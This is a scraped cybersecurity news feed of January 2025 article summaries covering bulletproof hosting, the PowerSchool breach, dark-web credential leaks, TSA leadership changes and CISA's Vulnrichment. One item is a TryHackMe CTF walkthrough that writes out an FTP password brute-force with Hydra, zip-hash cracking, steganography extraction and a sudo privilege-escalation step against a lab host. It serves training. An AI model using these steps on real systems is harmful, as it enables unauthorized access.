Australian Cyber Security Centre Targets Bulletproof Hosting Providers to Disrupt Cybercrime NetworksOverview The Australian Cyber Security Centre (ACSC) has issued a detailed warning regarding Bulletproof Hosting Providers (BPH). These illicit infrastructure services play a critical role in supporting cybercrime, allowing malicious actors to conduct their operations while remaining largely undetectable. The Australian government’s growing efforts to combat cybercrime highlight the increasing difficulty for cybercriminals to maintain secure, resilient, and hidden infrastructures. BPH services are an integral part of the Cybercrime-as-a-Service (CaaS) ecosystem, which provides a range of tools and services enabling cybercriminals to carry out their attacks. From ransomware campaigns to data theft, cybercriminals rely on BPH providers to host illicit websites, deploy malware, and execute phishing scams. These hosting services help criminals stay out of the reach of law enforcement and avoid detection, making it harder to track down those behind cyberattacks. The term ""bulletproof"" is somewhat misleading, as it is more of a marketing ploy than a reflection of the actual capabilities of these providers. Despite the branding, BPH providers remain vulnerable to disruption just like other infrastructure providers. What sets them apart is their blatant disregard for legal requests to shut down services, as they refuse to comply with takedown orders or abuse complaints from victims or law enforcement. This allows cybercriminals to continue their activities with little fear of being interrupted or exposed. How Bulletproof Hosting Providers Operate BPH providers typically lease virtual or physical infrastructure to cybercriminals, offering them a platform to run their operations. These services often include leasing IP addresses and servers that obscure the true identities of their customers. Many BPH providers achieve this by utilizing complex network switching methods, making it difficult to trace activity back to its source. In some cases, these providers even lease IP addresses from legitimate data centers or Internet Service Providers (ISPs), many of whom may remain unaware that their infrastructure is being used for criminal purposes. A key strategy employed by BPH providers is frequently changing the internet-facing identifiers associated with their customers. This could include altering IP addresses or domain names, further complicating efforts to track criminal activity. These techniques frustrate cybersecurity efforts and investigative agencies, hindering their ability to identify, apprehend, and disrupt criminal activity. Another distinctive feature of BPH providers is their location. They often operate from countries with permissive cyber regimes, where local laws either lack the framework to tackle malicious cyber activities or are weakly enforced. This makes it even more challenging for law enforcement, such as the ACSC, to take decisive action. BPH Providers’ Impact on Australian Cybersecurity The consequences of BPH’s involvement in cybercrime are damaging, with Australian businesses and individuals often finding themselves targeted by cybercriminals using these services. Ransomware attacks, data extortion, and the theft of sensitive customer information are just some of the incidents that have been traced back to BPH providers. The presence of these illicit services is not only a local problem but a global one. As these networks expand and evolve, they provide cybercriminals with an easy-to-use platform to launch attacks on a global scale. A single BPH provider can facilitate the activities of hundreds or even thousands of cybercriminals, allowing them to target victims across the globe. Collaborative Efforts to Combat Cybercrime In response to this growing threat, law enforcement agencies, including the ACSC, have been stepping up their efforts to identify and dismantle BPH providers. Through enhanced collaboration with global law enforcement, governments, and private sector cybersecurity experts, authorities are targeting these malicious services with increasing frequency. This collective effort aims to disrupt the underlying infrastructure that allows cybercriminals to thrive while complicating their ability to operate securely. One of the primary methods being employed to target BPH providers is defensive measures, such as proactively blocking internet traffic originating from known BPH services. By identifying and isolating the infrastructure that facilitates cybercrime, investigators can reduce the impact of cybercriminal activities on Australian networks and businesses. In addition, legitimate ISPs and upstream infrastructure providers are being encouraged to adopt practices that prevent BPH providers from accessing their networks. While BPH providers are a crucial part of the Cybercrime-as-a-Service landscape, they are not the only providers enabling malicious cyber activities. Other illicit services in this underground ecosystem allow cybercriminals to purchase malware, tools for evading security measures, and access to compromised networks. The removal of these services is critical to dismantling the cybercriminal ecosystem and reducing the scope of attacks targeting Australia. Conclusion The Australian Cyber Security Centre''s efforts to target Bulletproof Hosting Providers (BPH) highlight the need for a coordinated approach to disrupt the infrastructure enabling cybercrime. By addressing vulnerabilities in BPH services, authorities can disrupt cybercriminal operations and bolster overall cybersecurity resilience. Australia''s organizations are urged to stay vigilant by updating software, strengthening security protocols, and using multi-layered defenses. Collaboration with law enforcement and cybersecurity experts is essential for detecting and preventing attacks from BPH providers. To further protect against cyber threats, Cyble, a leader in threat intelligence, offers AI-powered solutions like Cyble Vision to provide real-time insights and enhance cybersecurity efforts. By integrating Cyble’s tools, businesses can strengthen their defenses and stay protected against cybercriminals. The post Australian Cyber Security Centre Targets Bulletproof Hosting Providers to Disrupt Cybercrime Networks appeared first on Cyble.
by CYBLE
2025-01-22 10:30:42
ASUS Adds AdGuard DNS to Wi-Fi 7 Routers for Ad BlockingASUS has announced the integration of AdGuard DNS as a built-in feature in its Wi-Fi 7-compatible routers, a move aimed at bolstering user security and privacy. The integration allows ASUS users to access AdGuard''s ad-blocking and anti-tracking services at the router level, potentially reducing online threats and improving browsing experiences. The decision to integrate AdGuard … The post ASUS Adds AdGuard DNS to Wi-Fi 7 Routers for Ad Blocking appeared first on CyberInsider.
by Cyber Insider
2025-01-22 10:28:54
What is SQL injection (SQLi), and how can it be prevented?Know what SQL injection is, so your business can understand, prevent and defend against these common yet often overlooked security attacks.
by ThreatDown
2025-01-22 10:19:04
Windows 11 24H2 now also offered to all eligible Windows 10 PCsMicrosoft says Windows 11 24H2 has entered the broad deployment phase and is now available to all seekers via Windows Update. [...]
by BleepingComputer
2025-01-22 10:11:48
IPany VPN breached in supply-chain attack to push custom malwareSouth Korean VPN provider IPany was breached in a supply chain attack by the ""PlushDaemon"" China-aligned hacking group, who compromised the company''s VPN installer to deploy the custom ''SlowStepper'' malware. [...]
by BleepingComputer
2025-01-22 10:00:10
Use this AI chatbot prompt to create a password-exclusion listCreating a custom password-exclusion list can help prevent employees from using passwords that are likely to be guessed. Learn from Specops Software on using AI to generate password dictionary for securing your organization''s credentials. [...]
by BleepingComputer
2025-01-22 09:50:33
Study: GenAI tools raise risk of sensitive data exposureThe study, which analyzed tens of thousands of prompts, revealed that nearly 8.5% of business users may have disclosed sensitive information, with 46% of these incidents involving customer data such as billing and authentication details.
by SC Media
2025-01-22 09:50:11
Growing risks of payment fraud detailed in 2024 reportThe report, prepared by the Insikt Group, the research division of cybersecurity firm Recorded Future, and based on data from dark web sources, e-commerce transactions, and threat actor behavior analysis, identified e-skimming, scam e-commerce websites, and surges in stolen payment data on illegal web marketplaces as drivers of the trend.
by SC Media
2025-01-22 09:43:59
Ratcliffe supports Section 702 amid FISA renewal debateAddressing the Senate Intelligence Committee, Ratcliffe called the statute “indispensable” for national security, noting that it provides over half of the actionable foreign intelligence used by the president.
by SC Media
2025-01-22 09:39:35
Xona Platform simplifies user access deploymentXona Systems launched new Xona Platform. Designed to provide simple user access without allowing insecure user endpoints from connecting to critical assets, the platform is redefining how industries such as utilities, oil & gas, and manufacturing approach secure access for remote workers, 3rd parties, and onsite employees. As companies face increasing threats to their critical IT, OT, and cloud-based systems and tighter regulatory compliance mandates, the Xona Platform delivers security and ease of use, offering … More → The post Xona Platform simplifies user access deployment appeared first on Help Net Security.
by Help Net Security
2025-01-22 09:39:31
UN Security Council launches 1st discussion tackling commercial spywareThe meeting, which was called for by the United States and 15 other nations, sought to address the proliferation and misuse of government and mercenary spyware.
by SC Media
2025-01-22 09:38:33
Hackers exploit 16 zero-days on first day of Pwn2Own Automotive 2025On the first day of Pwn2Own Automotive 2025, security researchers exploited 16 unique zero-days and collected $382,750 in cash awards. [...]
by BleepingComputer
2025-01-22 09:37:53
Security concerns raised over Chinese telecom firm BaicellsThe company, which operates equipment in each U.S. state and serves over 700 networks, has faced criticism for vulnerabilities in its firmware flagged by the Cybersecurity and Infrastructure Security Agency.
by SC Media
2025-01-22 09:33:37
Cloudflare blocked a record-breaking 5.6 Tbps DDoS attackCloudflare announced that it has blocked a record-breaking 5.6 terabit-per-second (Tbps) distributed denial-of-service (DDoS) attack. Cloudflare announced that during the week of Halloween 2024, it autonomously detected and blocked a 5.6 Terabit per second (Tbps) DDoS attack, which is the largest attack ever reported. The previous largest DDoS attack blocked by Cloudflare occurred in October […]
by Security Affairs
2025-01-22 09:24:53
Decades of Toronto District School Board data likely compromised in PowerSchool hack falloutAside from the possible compromise of names, birthdates, genders, home addresses, phone numbers, and health card digits, TDSB students enrolled beginning Sep. 2017 may have also had their parent, guardian, or caregiver contact details and certain medical data leaked.
by SC Media
2025-01-22 09:22:49
Disruptions at Conduent linked to third-party breach""This compromise was quickly contained and our technology environment is currently considered to be free of known malicious activity as confirmed by our third-party security experts,"" said a Conduent spokesperson, who did not confirm whether the intrusion involved ransomware or data exfiltration.
by SC Media
2025-01-22 09:04:49
New 0-Click Attack Can Geolocate Signal and Discord UsersA 15-year-old security researcher, Daniel (@hackermondev), has disclosed a zero-click deanonymization attack capable of revealing a user''s approximate location within a 250-mile radius. The attack exploits content delivery network (CDN) caching mechanisms, particularly Cloudflare''s caching infrastructure, and affects widely used platforms such as Signal and Discord. Despite responsible disclosure, responses from affected companies have been … The post New 0-Click Attack Can Geolocate Signal and Discord Users appeared first on CyberInsider.
by Cyber Insider
2025-01-22 09:00:15
EnGenius Cloud Managed ESG320 VPN Router improves security and network performanceEnGenius released EnGenius Cloud Managed ESG320 VPN Router. Designed to meet the growing demands of small businesses, the ESG320 delivers enterprise-grade performance, security, and simplified cloud-based management, making it the ideal choice for companies looking to optimize their network infrastructure, ensure data protection, and increase operational efficiency. Comprehensive security with a stateful firewall Businesses face the challenge of securing their networks from external threats while maintaining smooth operations. The ESG320 Cloud Managed VPN Router addresses this … More → The post EnGenius Cloud Managed ESG320 VPN Router improves security and network performance appeared first on Help Net Security.
by Help Net Security
2025-01-22 08:43:00
Google Cloud links poor credentials to nearly half of all cloud-based attacksCloud services with weak credentials were a prime target for attackers, often resulting in lateral movement attempts, a Google Cloud report found.
by Cybersecurity Dive
2025-01-22 08:35:00
DHS disbands existing advisory board memberships, raising questions about CSRBThe Cyber Safety Review Board was investigating the hacks of U.S. telecom firms attributed to the Salt Typhoon threat group.
by Cybersecurity Dive
2025-01-22 08:28:57
Inversion6 launches service to help companies combat cyber threatsInversion6 launched its new Incident Response (IR) Service, a comprehensive offering to help organizations effectively manage, mitigate and recover from cybersecurity incidents. “Our new service empowers businesses to respond to incidents with speed and precision, safeguarding their operations and reputation,” said Matt Kennedy, CEO of Inversion6. With threats such as ransomware, business email compromise (BEC), and advanced persistent threats (APT) on the rise, Inversion6 provides expert-led solutions to ensure businesses are prepared when every second … More → The post Inversion6 launches service to help companies combat cyber threats appeared first on Help Net Security.
by Help Net Security
2025-01-22 08:15:46
A 7-Zip bug allows to bypass the Mark of the Web (MotW) featureA vulnerability in the 7-Zip file software allows attackers to bypass the Mark of the Web (MotW) Windows security feature. Attackers can exploit a vulnerability, tracked as CVE-2025-0411, in the free, open-source file archiver software 7-Zip to bypass the Mark of the Web (MotW) Windows security feature. Mark of the Web (MotW) is a security […]
by Security Affairs
2025-01-22 08:12:57
Cyble Finds Thousands of Security Vendor Credentials on Dark WebOverview Account credentials from some of the largest cybersecurity vendors can be found on the dark web, a result of the growing problem of infostealers, according to an analysis of Cyble threat intelligence data. The credentials – available for as little as $10 in cybercrime marketplaces – span internal accounts and customer access across web and cloud environments, including internal security company enterprise and development environments that could pose substantial risks. The accounts ideally would have been protected by multifactor authentication (MFA), which would have made any attack more difficult. However, the leaked credentials underscore the importance of dark web monitoring as an early warning system for keeping such leaks from becoming much bigger cyberattacks. Leaked Security Company Credentials Leaked credentials have an inherent time value – the older the credentials, the more likely the password has been changed – so Cyble researchers looked only at credentials leaked since the start of the year. Cyble looked at 13 of the largest enterprise security vendors—along with some of the bigger consumer security companies—and found credentials from all of them on the dark web. The credentials were likely pulled from info stealer logs and then sold in bulk on cybercrime marketplaces. Most of the credentials appear to be customer credentials that protect access to sensitive management and account interfaces, but all the security vendors Cyble examined had access to internal systems leaked on the dark web, too. Security vendors had credentials leaked to potentially critical internal systems such as Okta, Jira, GitHub, AWS, Microsoft Online, Salesforce, SolarWinds, Box, WordPress, Oracle, and Zoom, plus several other password managers, authentication systems, and device management platforms. Cyble did not attempt to determine whether any of the credentials were valid, but many were for easily accessible web console interfaces, SSO logins, and other web-facing account access points. The vendors Cyble looked at included a range of network and cloud security providers, including some of the biggest makers of SIEM systems, EDR tools, and firewalls. All have had data exposures just since the start of the year that ideally were addressed quickly, or at least required additional authentication steps for access. One of the largest security vendors Cyble looked at may have more sensitive accounts exposed, as company email addresses are listed among the credentials for several sensitive accounts, including developer and product account interfaces and customer data. Depending on the privileges granted to those accounts, the exposure could be substantial. Credential Leaks Could Aid in Hacker Reconnaissance Even if all the exposed accounts were protected by other means, as ideally, they were, such leaks are concerning for one other reason: They can help threat actors conduct reconnaissance by giving them an idea of the systems that a potential target uses, including locations of sensitive data and potential vulnerabilities to exploit. Other sensitive information exposed by info stealers could include URLs of management interfaces that are unknown to the public, which would give hackers further recon information. Conclusion: Dark Web Monitoring is Critical for Everyone Dark web monitoring is an underappreciated and cost-effective security tool for one very big reason: Credential leaks frequently come before much bigger security incidents like data breaches and ransomware attacks. Leaked credentials for security tools and other important systems are important to monitor not only to prevent breaches but also to keep hackers from learning important information about an organization''s systems and how to access them. If the largest security vendors can be hit by info-stokers, so can any organization. Basic cybersecurity practices like MFA, zero trust, vulnerability management, and network segmentation are important for minimizing—and ideally preventing—data breaches, ransomware, and other cyberattacks. Update 1:18 a.m. UTC January 23, 2025: After a few vendors reached out to Cyble, the decision was made to redact the affected vendor names to preserve confidentiality. The post Cyble Finds Thousands of Security Vendor Credentials on Dark Web appeared first on Cyble.
by CYBLE
2025-01-22 08:11:00
PowerSchool data breach brings claims of negligence, poor cyber hygieneThe K-12 software company is facing legal pushback and criticism following a cyberattack that impacted a still unknown number of districts.
by Cybersecurity Dive
2025-01-22 08:09:04
Cyberattack Hits PowerSchool, Exposing Personal Data of Students and StaffPowerSchool, a leading provider of cloud-based software used by schools to manage student information, experienced a cybersecurity incident. The PowerSchool cyberattack, which occurred between December 22 and December 28, 2024, affected several school districts across North America. This cyberattack on school systems involved the unauthorized exportation of personal data from PowerSchool''s Student Information System (SIS) through its community-focused customer support portal, PowerSource. In response to the PowerSchool cyberattack, the school has been proactive in providing support to affected schools, students, and educators; while also outlining the steps it is taking to strengthen its security infrastructure. What Happened During the PowerSchool Cyberattack? The PowerSchool cyberattack was first detected on December 28, 2024, when PowerSchool became aware of unauthorized access to personal information stored in its SIS. The data was allegedly exported through PowerSource, a customer support portal used by schools and districts for community engagement. Although PowerSchool confirmed the breach, it emphasized that no evidence of malware or continued unauthorized activity had been found within its systems. Importantly, PowerSchool also clarified that the breach did not disrupt any of its services, and there were no reports of other PowerSchool products being affected. The company has maintained that its services continued as normal throughout the investigation, with no operational downtime for its customers. What Information Was Compromised in this PowerSchool cyberattack? The information stolen during the PowerSchool cyberattack included a range of personal data, particularly affecting students and educators. The compromised information during the PowerSchool cyberattack may have included names, contact details, dates of birth, Social Security numbers (SSNs), and medical alerts, as well as other related data. The exact data involved in each case varied depending on the specific requirements of the school districts using PowerSchool. For students, the breach potentially impacted data such as: Full names Contact information Date of birth Health-related information (such as allergies, conditions, and injuries) Social Security numbers (SSNs) Residential information In addition, educators'' personal information, including names, dates of birth, and SSNs, was also affected by the breach. However, PowerSchool confirmed that no financial or banking data, including credit card information, was involved in the incident. Steps Taken to Address the PowerSchool Cyberattack As soon as the breach was discovered, PowerSchool implemented its cybersecurity response protocols, engaging third-party cybersecurity experts to investigate the scope of the incident. A cross-functional response team, including senior leadership, was mobilized to assess the breach and work with affected school districts. PowerSchool has been transparent about the steps it is taking to mitigate the impact of the cyberattack and protect the personal information of affected individuals. One of the key measures the company introduced is the offering of complimentary identity protection services and credit monitoring for all impacted students and educators. Identity Protection: PowerSchool is offering two years of free identity protection services to all students and educators whose information was involved in the breach. This service will help monitor and prevent potential identity theft. Credit Monitoring: For adult students and educators, PowerSchool is offering two years of complimentary credit monitoring services. This service aims to protect individuals whose SSNs were potentially exposed. Additionally, PowerSchool has worked with Experian, a reputable credit reporting agency, to manage the identity protection and credit monitoring services. Notifications will be sent to affected students and educators, with PowerSchool coordinating the outreach through direct emails and public notices. How Schools and Districts Are Responding to the Breach Various school districts across North America, including the Toronto District School Board (TDSB), have provided updates to their communities. TDSB, which uses PowerSchool’s SIS, confirmed that the breach involved data from students who attended the district between September 1, 1985, and December 28, 2024. The data compromised in the PowerSchool cyberattack included personal details such as health card numbers, student IDs, medical information, and addresses. The breach was reported to regulatory authorities, including the Office of the Information and Privacy Commissioner of Ontario (IPC), which has launched an investigation into the matter. TDSB assured parents and guardians that there is no ongoing threat to its systems, and the incident has been contained. Conclusion The PowerSchool cyberattack highlights the critical need for stronger cybersecurity in schools as they increasingly rely on digital platforms. While PowerSchool has taken steps to address the breach, the incident emphasizes the importance of protecting sensitive student and educator data. Schools must prioritize better security measures and remain vigilant to prevent future breaches, ensuring the safety of personal information.
by The Cyber Express
2025-01-22 08:00:00
SonicWall CVE-2024-53704: SSL VPN Session HijackingBishop Fox researchers have successfully exploited CVE-2024-53704, an authentication bypass affecting the SSL VPN component of unpatched SonicWall firewalls.
by Bishop Fox
2025-01-22 07:35:52
Trump’s Team Removes TSA Leader Pekoske as Cyber Threats IntensifyDavid Pekoske, the Administrator of the Transportation Security Administration (TSA), was removed from his position by the Trump administration. Pekoske, who had been appointed by former President Donald Trump in 2017 and had his tenure renewed by President Joe Biden in 2022, sent a farewell memo to TSA staff, explaining that he had been advised by Trump’s transition team that his time at the helm would end at noon on Monday. In his message to staff, David Pekoske praised the commitment of TSA employees, noting the tremendous responsibility they carry to ensure safe travel and the delivery of goods across the United States. “People place their trust in you no matter what your job is in TSA, so they can travel, and the goods they rely on can reach them via our transportation systems,” he wrote. “It’s an incredible responsibility that each of you has been entrusted with, and you carry it out in a manner that is an example of the best of America.” While Pekoske’s departure was confirmed by the Department of Homeland Security on Tuesday, the agency did not disclose who would replace him. The Cyber Express requests for comment directed to the White House went unanswered. Notably, David Pekoske’s farewell memo did not mention the reason behind his sudden removal, leaving many to speculate about the circumstances. [caption id=""attachment_100387"" align=""aligncenter"" width=""686""] Source: X[/caption] David Pekoske’s Leadership and Cybersecurity Achievements Pekoske’s time at the TSA was marked by significant efforts to address cybersecurity in the critical infrastructure sectors under his jurisdiction. His tenure included the implementation of cybersecurity directives for the airline, pipeline, and rail industries, a move that was seen as vital for protecting U.S. transportation and energy systems against growing digital threats. Under Pekoske’s leadership, the TSA played an essential role in improving cybersecurity measures in response to growing concerns about cyberattacks from adversarial nations like China and Russia. One of Pekoske’s key initiatives was the introduction of cybersecurity rules that focused on fundamental yet critical tasks for organizations in these sectors, such as reporting cyber incidents, establishing cybersecurity coordinators, and developing incident response plans. These regulations were designed to bring sectors up to minimum cybersecurity standards and to help mitigate the risks posed by cybercriminals. Following the devastating ransomware attack on Colonial Pipeline in 2021, the Biden administration pushed for more robust cybersecurity measures. Pekoske became a central figure in these efforts, contributing to some of the most impactful cybersecurity initiatives of the administration. By October 2024, nearly 100% of critical pipelines and 68% of railways were meeting the minimum cybersecurity standards, a testament to the success of the regulations he championed. In the aviation sector, the percentage of organizations meeting basic cybersecurity standards jumped from 0% to 57% under his watch. Pekoske was also vocal about the evolving cyber threats and the urgency of coordinated action. At the DEF CON security conference in 2023, he emphasized TSA’s role in quickly responding to emerging threats and issuing emergency directives. He noted that the intelligence gathered from security officials regarding cyber threats was consistently growing more concerning, particularly from nations like China and Russia. “You don’t issue emergency amendments to a security plan unless you feel like you are in an emergency situation,” Pekoske said at the time. “The intelligence we’re getting is consistent. It’s getting consistently more concerning over time.” Cybersecurity Landscape and the Role of TSA The TSA’s increasing focus on cybersecurity reflects the growing importance of digital security across all industries, especially in sectors critical to national infrastructure. Pekoske’s tenure marked a shift in the TSA’s role, with the agency expanding its cybersecurity scope to address emerging threats in an interconnected world. As digital attacks become more sophisticated, agencies like the TSA are required to adapt quickly and implement measures that protect both physical and digital assets. In the context of the broader U.S. cybersecurity efforts, Pekoske’s work with TSA was part of an ongoing national conversation about how to better safeguard U.S. infrastructure. Under the Biden administration, significant strides were made to bolster defenses against foreign cyberattacks, particularly from China. Pekoske’s efforts were in line with these priorities, helping create a safer environment for critical industries such as transportation, energy, and aviation. However, his departure, coming amidst rising cyber threats, has left some questioning what the future holds for TSA’s cybersecurity efforts. While the White House has yet to comment on his replacement, the timing of his removal has raised eyebrows, particularly given the critical cybersecurity challenges facing the U.S. Cybersecurity Concerns Under the Biden Administration Pekoske’s exit follows closely on the heels of the resignation of Anne Neuberger, a key figure in the Biden administration’s efforts to combat cyber threats, particularly those originating from China, and coincided with the dismissal of Homeland Security advisory committee members, including the Cyber Safety Review Board that had investigated Microsoft security lapses and was looking into the Salt Typhoon telecom hacks. Neuberger’s resignation, announced on January 17, 2025, sparked discussions about the direction of the U.S. government’s cybersecurity policies. Neuberger’s leadership was instrumental in addressing cyberattacks targeting U.S. infrastructure, including power grids, communication systems, and other critical sectors. Her departure came at a time when the U.S. was facing an escalation of cybercrime, particularly attacks linked to Chinese state-sponsored actors. Under Neuberger’s guidance, the Biden administration had made significant strides in addressing these threats, with a focus on securing vulnerable infrastructure and strengthening the nation’s overall cybersecurity posture. The combined exits of Pekoske and Neuberger highlight the ongoing challenges the U.S. faces in combating cyber threats, which have become a central concern for national security. As these shifts occur, cybersecurity professionals are left to wonder what the future holds for the country’s efforts to protect its digital and physical infrastructure from increasing cyberattacks.
by The Cyber Express
2025-01-22 07:00:00
Mandatory MFA, Biometrics Make Headway in Middle East, AfricaDespite lagging in technology adoption, African and Middle Eastern organizations are catching up, driven by smartphone acceptance and national identity systems.
by Dark Reading
2025-01-22 06:52:15
Agent Sudo CTF — TryHackMe WritupAgent Sudo CTF — TryHackMe WritupA secret server is located under the deep sea; hack and reveal the truth.You found a secret server located deep under the sea. Your mission? Hack inside the server and reveal the hidden truth. This walkthrough will guide you through the process step-by-step, from enumeration to privilege escalation.1. EnumerationTarget IP: 10.10.165.175To start, I ran an Nmap scan on the target, revealing three open ports:nmap 10.10.165.175 -vPORT STATE SERVICE21/tcp open ftp22/tcp open ssh80/tcp open httpHomepage ClueVisiting http://10.10.165.175/ revealed the following message:Dear agents,Use your own codename as user-agent to access the site.From,Agent RThe codename likely refers to a user-agent string, possibly one of the alphabet (Agent A to Z). To test this hypothesis, I used Burp Suite''s Intruder to brute-force user-agent strings.Using Burp SuiteI have inserted payload in user-agent from A to Z, and forwarded through intruder.Intruder in BurpSuiteResponse length for C and R are different, for C less and for R more. By analyzing I found R have much content asWhat are you doing! Are you one of the 25 employees? If not, I going to report this incident Dear agents,Use your own <b>codename</b> as user-agent to access the site.From,Agent RBut in case of C, there is status code `302` and the location is `Location: agent_C_attention.php`Response for user-agent: CNow visit the location we found,Attention chris,Do you still remember our deal? Please tell agent J about the stuff ASAP. Also, change your god damn password, is weak!From,Agent RThe agent name is `chris` and it says the password is weak.2. AttackingLets try out password crack for user cheris in FTP. We will use hydra for attack and rockyou.txt for password list.FTP Loginhydra -l chris -P /usr/share/wordlists/rockyou.txt 10.10.165.175 ftpFTP password attackAfter the successful login to FTP, we gotftp> ls200 PORT command successful. Consider using PASV.150 Here comes the directory listing.-rw-r--r-- 1 0 0 217 Oct 29 2019 To_agentJ.txt-rw-r--r-- 1 0 0 33143 Oct 29 2019 cute-alien.jpg-rw-r--r-- 1 0 0 34842 Oct 29 2019 cutie.png226 Directory send OK.All the files are download by simply `get` command.The message says that the password is stored inside the image. So need to apply the concept to steganography.❯ cat To_agentJ.txtDear agent J,All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn''t be a problem for you.From,Agent CSteganographyNow, using `binwalk` and getting info if found.❯ binwalk cute-alien.jpgDECIMAL HEXADECIMAL DESCRIPTION--------------------------------------------------------------------------------0 0x0 JPEG image data, JFIF standard 1.01❯ binwalk cutie.pngDECIMAL HEXADECIMAL DESCRIPTION--------------------------------------------------------------------------------0 0x0 PNG image, 528 x 528, 8-bit colormap, non-interlaced869 0x365 Zlib compressed data, best compression34562 0x8702 Zip archive data, encrypted compressed size: 98, uncompressed size: 86, name: To_agentR.txt34820 0x8804 End of Zip archive, footer length: 22Now extracting the cutie.png using `binwalk -e cutie.png` we have 365, 365.zlib and 8702.zip files, zip is important and is password protected.I used John the Ripper to crack the zip’s password. First creating hash by and then cracking the hash as❯ zip2john 8702.zip > zip_pass.hash❯ john --wordlist=/usr/share/wordlists/rockyou.txt zip_pass.hash.............Press ''q'' or Ctrl-C to abort, almost any other key for statusali** (8702.zip/To_agentR.txt)1g 0:00:00:00 DONE (2024-10-08 17:45) 1.162g/s 28576p/s 28576c/s 28576C/s christal..280789Session completedNow we have zip password, extract it. Was a message:Agent C,We need to send the picture to ''QXJlYTUx'' as soon as possible!By,Agent RHere `QXJlYTUx` is encoded, lets decode using base64 asecho ''QXJlYTUx'' | base64 -dArea**Now look into cute-alien.jpg, using `steghide`. After the command `steghide — info cute-alien.jpg`, we found that the `message.txt` file is embedded there.Finally, using steghide, I extracted the hidden message from cute-alien.jpg:steghide --extract -sf cute-alien.jpg❯ cat message.txtHi jam**,Glad you find this message. Your login password is hacker******Don''t ask me why the password look cheesy, ask agent R who set this password for you.Your buddy,chris3. Capture the FlagI used the credentials to SSH into the server:ssh jam**@10.10.165.175After logging in, I captured the user flag.Capturing user flagTo know the incident of the photo `Alien_autospy.jpg` we need to download (maybe using scp) and search on google asscp jam**@10.10.165.175:/home/jam**/Alien_autospy.jpg .By searching we found the image from `Roswell`4. Privilege EscalationRunning sudo -l revealed that the user could run /bin/bash as sudo.The sudo version (1.8.21p2) was vulnerable to CVE-2019-14***. Using an exploit from Exploit-DB, I escalated privileges to root:sudo ***** /bin/bashAfter successfully gaining root access, I retrieved the root flag.Capturing root flagFinal message from Agent R isTo Mr.hacker,Congratulation on rooting this box. This box was designed for TryHackMe. Tips, always update your machine. By,Des*** a.k.a Agent RThis was a fun and insightful challenge that covered enumeration, brute-forcing, steganography, and privilege escalation.Happy hackers! Happy Hacking!!Agent Sudo CTF — TryHackMe Writup was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
by InfoSec Write-ups
2025-01-22 06:29:01
Criminal IP and OnTheHub Partner to Deliver Advanced Cybersecurity Solutions for EducationTorrance, United States / California, 22nd January 2025, CyberNewsWire
by Hackread
2025-01-22 05:46:41
Turning Data into Decisions: How CVE Management Is ChangingEvery day, hundreds of new Common Vulnerabilities and Exposures (CVEs) are published, many of which target critical systems that keep businesses and governments operational. For cybersecurity professionals, simply knowing that a vulnerability exists is not enough. What’s needed is context—a deeper understanding of the CVE data, its potential impact, and how to prioritize its remediation. Enter Vulnrichment, an initiative launched by the Cybersecurity and Infrastructure Security Agency (CISA) on May 10, 2024. Designed to enhance vulnerability data with context, scoring, and actionable insights, Vulnrichment aims to give cybersecurity professionals a much-needed edge in managing vulnerabilities. Now, several months into the program, it’s clear that Vulnrichment is changing the game for defenders across the industry. A Turbocharged Upgrade to CVE Data For anyone responsible for vulnerability management, Vulnrichment offers a significant upgrade. The initiative enhances basic CVE records with: Stakeholder-Specific Vulnerability Categorization (SSVC): Decision points that evaluate exploitability, impact, and more. Common Weakness Enumeration (CWE) IDs: Specific details about the root cause of vulnerabilities. Common Vulnerability Scoring System (CVSS): Standardized metrics that quantify a vulnerability’s severity. And the best part? You don’t need to lift a finger to access these enriched insights. The additional data is already baked into the CVE feeds you’re likely pulling from resources like CVE.org or GitHub. How It Works The enriched Vulnrichment data is stored in the Authorized Data Publisher (ADP) container for each CVE. For example, if you’re analyzing CVE-2023-45727, which recently made it to CISA’s Known Exploited Vulnerabilities (KEV) list, you can easily query enriched fields like “Exploitation” using tools such as jq. This field tells you if a vulnerability is actively exploited, has a proof-of-concept (PoC) exploit, or none of the above. With this actionable intelligence, security teams can focus their efforts on vulnerabilities that pose the greatest risk, making prioritization a more straightforward process. Benefits of Vulnrichment Why should you care about Vulnrichment? Here’s what sets it apart: 1. Clarity and Actionability CVE data on its own often lacks depth. Vulnrichment adds essential context, such as whether a vulnerability has been exploited in the wild or requires user interaction. These insights help cybersecurity teams understand not just the existence of a vulnerability but its real-world risk. 2. Streamlined Prioritization Deciding what to patch first is no easy task, especially for organizations managing hundreds of vulnerabilities. Vulnrichment simplifies this process by providing insights into: Exploitability: Is there an active exploit? Technical Impact: How severe is the potential damage? Automatability: Can attackers easily exploit this vulnerability? With this data, security teams can confidently prioritize their remediation efforts, addressing high-risk vulnerabilities before attackers can exploit them. 3. Confidence in Your Data Vulnrichment ensures that CVE records are more accurate and complete. When key data points are missing from the original CVE record, CISA fills in the gaps, adding crucial details like CWEs and CVSS scores. If new information becomes available from the original source, Vulnrichment adjusts accordingly, ensuring the data remains up-to-date and reliable. Community Collaboration One of the standout features of Vulnrichment is its commitment to transparency and community engagement. If users spot an error in the enriched data—like an incorrect CWE assignment—they can report it directly via GitHub. CISA takes these reports seriously and aims to resolve them promptly. This responsiveness not only improves the quality of the data but also fosters trust and collaboration within the cybersecurity community. Real-World Impact “Given enough eyeballs, all bugs are shallow,” famously said Eric S. Raymond in The Cathedral and the Bazaar. Vulnrichment exemplifies this philosophy by leveraging the collective expertise of the cybersecurity community to refine and enrich CVE data. But this initiative is more than an academic exercise. It’s a practical, ongoing effort to make vulnerability data more useful and actionable for everyone—from researchers and analysts to IT managers. By adding operational context, scoring, and detailed analysis, Vulnrichment empowers organizations to make smarter, faster decisions about their cybersecurity posture. Why Vulnrichment Matters The ability to quickly assess the risk posed by a vulnerability and take action can mean the difference between an attack and a breach. Vulnrichment equips cybersecurity teams with the insights they need to stay one step ahead of attackers. With Vulnrichment, CISA isn’t just enhancing CVE data—it’s building a dynamic, living resource that benefits the entire cybersecurity ecosystem. And in a field where every second counts, that’s a power-up no one can afford to ignore.
by The Cyber Express
2025-01-22 05:00:00
Understanding the EU’s Cyber Resilience Act (CRA)Find out how the Cyber Resilience Act (CRA) sets new security standards for the EU and how Snyk can help simplify compliance with its developer-friendly tools.
by Snyk
2025-01-22 03:23:23
